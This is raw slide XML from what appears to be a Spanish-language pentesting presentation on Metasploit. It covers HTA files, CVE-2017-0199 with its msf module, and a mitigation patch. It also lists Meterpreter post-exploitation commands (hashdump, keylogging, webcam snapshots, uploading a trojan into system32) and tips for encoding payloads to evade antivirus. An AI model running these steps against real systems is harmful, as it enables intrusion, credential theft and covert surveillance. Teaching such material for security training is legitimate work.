              </a:rPr>
              <a:t> de un HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ejecutable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vienen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usando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desde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> IE 5. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Estos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archivos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> son </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>comunmente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utilizados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por</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> virus para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>actualizar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> claves del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>registro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="007DB0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Básicamente</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aplicación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> HTA que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sirve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código</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dinámico</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>soporta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lenguajes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de scripting de IE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>como</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> VBScript y JS. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Estos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archivos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ejecutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tomar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en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cuenta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>modelo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>seguridad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>navegador</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hecho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ejecutan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como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aplicaciones</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>totalmente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confiables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="007DB0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>La CVE-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2017-0199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fue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descubierta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por</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ingenería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inversa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>muestras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>público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por</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>equipo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de FireEye.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="007DB0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>También</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>puede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explotar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msf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solamente</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use exploit/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fileformat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>office_word_hta</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="007DB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HTA powers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2319165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01630" y="209725"/>
            <a:ext cx="937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 err="1">
                <a:solidFill>
                  <a:srgbClr val="0087AF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0087AF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0087AF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0087A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2377" y="794500"/>
            <a:ext cx="1197739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 err="1"/>
              <a:t>getuid</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>idletime</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t> c:\\boot.ini</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>edit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t> edit.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t> -f cmd.exe -i -H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hashdump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credential_collector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>migrate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manage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>migrate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manage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>multi_meterpreter_inject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t> PAYLOAD=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shell_bind_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t> -f autoexec.bat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t> evil_trojan.exe c:\\windows\\system32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>webcam_list</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>webcam_snap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>screenshot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enum_applications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enum_logged_on_users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enum_shares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usb_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>use post/multi/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>recon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>local_exploit_suggester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/capture/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>keylog_recorder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>background</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>jobs</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>sessions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arp_scanner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t> RHOSTS=192.168.1.0/24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checkvm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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631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63349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6600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004E8E"/>
                </a:solidFill>
                <a:latin typeface="Vonique 92"/>
                <a:cs typeface="Vonique 92"/>
              </a:rPr>
              <a:t>Mitigación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1" y="1628021"/>
            <a:ext cx="6008914" cy="4806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5268" y="1628021"/>
            <a:ext cx="49295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400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0087AF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CVE-2017-0199 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="es-UY" sz="2400" noProof="1">
              <a:solidFill>
                <a:srgbClr val="0087AF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>KB3178703</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="3600" b="1" noProof="1">
              <a:solidFill>
                <a:srgbClr val="0087A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457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5775" y="2317231"/>
            <a:ext cx="98274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07DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lleva</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007DB0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tiempo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="007DB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Ofuscar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y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encodear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payload</a:t>
            </a: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Usar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PEscrambler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(Veil-Evasion)</a:t>
            </a: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Probar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en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VMs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propias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y no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VirusTotal</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="2500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="007DB0"/>
              </a:solidFill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Av evasion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="302955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53" y="4380890"/>
            <a:ext cx="10818171" cy="22203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UY" sz="2200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0087AF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Metasploit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 fue creado por </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0087AF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>H.D. Moore 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en el 2003 como una herramienta de red portátil que usa el lenguaje </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0087AF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Perl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. El 21 de octubre de 2009, el Proyecto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0087AF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Metasploit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 anunció que había sido adquirida por </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0087AF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Rapid7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, una empresa de seguridad que ofrece </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0087AF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>soluciones unificadas de gestión de vulnerabilidades.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995" y="203838"/>
            <a:ext cx="3474190" cy="41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6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431" y="0"/>
            <a:ext cx="693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70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633" y="1166696"/>
            <a:ext cx="9883699" cy="5691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0972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600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004E8E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Búsqueda de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="004E8E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>exploits</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="004E8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083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34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Screen_Shot_2016-07-07_at_4.14.19_PM.0.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8498" y="0"/>
            <a:ext cx="13773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0377" y="3339823"/>
            <a:ext cx="6976643" cy="1115736"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY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Vonique 92"/>
                <a:cs typeface="Vonique 92"/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011179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ENTEST.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679" y="-1"/>
            <a:ext cx="12448736" cy="7002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9794" y="2947823"/>
            <a:ext cx="5161953" cy="1115736"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="es-UY" sz="8000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0087AF"/>
                </a:solidFill>
                <a:latin typeface="Vonique 92"/>
                <a:cs typeface="Vonique 92"/>
              </a:rPr>
              <a:t>¡GRACIAS!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60359" y="4064605"/>
            <a:ext cx="418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UY" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0087AF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://github.com/guillermo85/presentaciones.git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4758" y="3859923"/>
            <a:ext cx="418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UY" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0087AF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Guillermo.rodriguez@intradosti.com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5141" y="6106836"/>
            <a:ext cx="2487004" cy="44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4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339"/>
            <a:ext cx="12192000" cy="6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61" y="1543140"/>
            <a:ext cx="11025726" cy="36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75" y="65860"/>
            <a:ext cx="11048999" cy="6792140"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="332481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216" y="1491292"/>
            <a:ext cx="10444899" cy="367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Metasploit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actualmente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cuenta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con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más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1700 exploits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,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organizados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en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categorías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:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="007DB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Firefox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ejecución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remota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en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navegadores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Android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y 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Apple's </a:t>
            </a:r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iOs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dedicados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a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dispostivos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móviles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Linux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, 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Windows, BSD, </a:t>
            </a:r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Irix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, Solaris (</a:t>
            </a:r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sistemas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operativos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).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="007DB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Multi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para exploits que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sirven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a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más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un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sistema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endParaRPr lang="es-UY" sz="2600" dirty="0">
              <a:solidFill>
